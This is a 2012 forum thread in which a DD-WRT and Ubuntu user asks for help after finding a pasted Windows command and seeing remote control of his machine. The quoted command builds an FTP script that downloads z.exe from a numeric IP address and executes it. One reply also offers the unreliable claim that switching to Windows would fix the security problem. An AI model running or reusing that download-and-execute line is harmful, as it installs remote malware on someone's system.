Author Topic: * I've Been Hacked *  (Read 2127 times)

mvyvoda

• Calf
* I've Been Hacked *
« on: April 26, 2012, 02:19:45 PM »

Greetings. I am using Buffalo wireless router G300NH, DD-WRT build 14998. I am using Ubuntu and need help please!! I came home to find this in a field in Chrome:

Quote:
cmd /c echo open 79.137.62.50 21 >> ik &echo user Anonymous Anonymous >> ik &echo binary >> ik &echo get z.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &z.exe &exitkcmd /c echo open 79.137.62.50 21 >> ik &echo user Anonymous Anonymous >> ik &echo bi

I am certain i have been hacked and someone is trying to control my system (even though it looks like DOS commands). Also, two weeks ago, I was at my Ubuntu computer and my mouse started to move and then a command prompt showed up. They started typing rapidly. I immediately turned off internet. They are back. RKHunter returns OK for everything...

Please help me: 
1.) confirm my integrity has been compromised
2.) suggest methods to prevent this from happening.
3.) explain to me how they even got in. I thought I have a secure system 

I really appreciate any help you can suggest. I am a novice and barely know what /etc is. 

Thanks,
Mark

slybunda

• Buffalo
Re: * I've Been Hacked *
« Reply #1 on: April 26, 2012, 05:45:38 PM »

switch to windows system, linux has too many security holes and no paid developers to fix them.

buddee

• Big Bull
Re: * I've Been Hacked *
« Reply #2 on: April 26, 2012, 06:59:07 PM »

You really don't give much thought to your answers do you? Guess you better use a windows based router then, dd-wrt and pretty much all the 3rd party firmware are all linux driven...Windows is far from secure and riddled with spyware/malware/virus, and probably the most compromised OS out there, thats why big networks don't use it to run their main servers.

To the OP - If you switch to a more secure OS, i would of course suggest OpenBSD.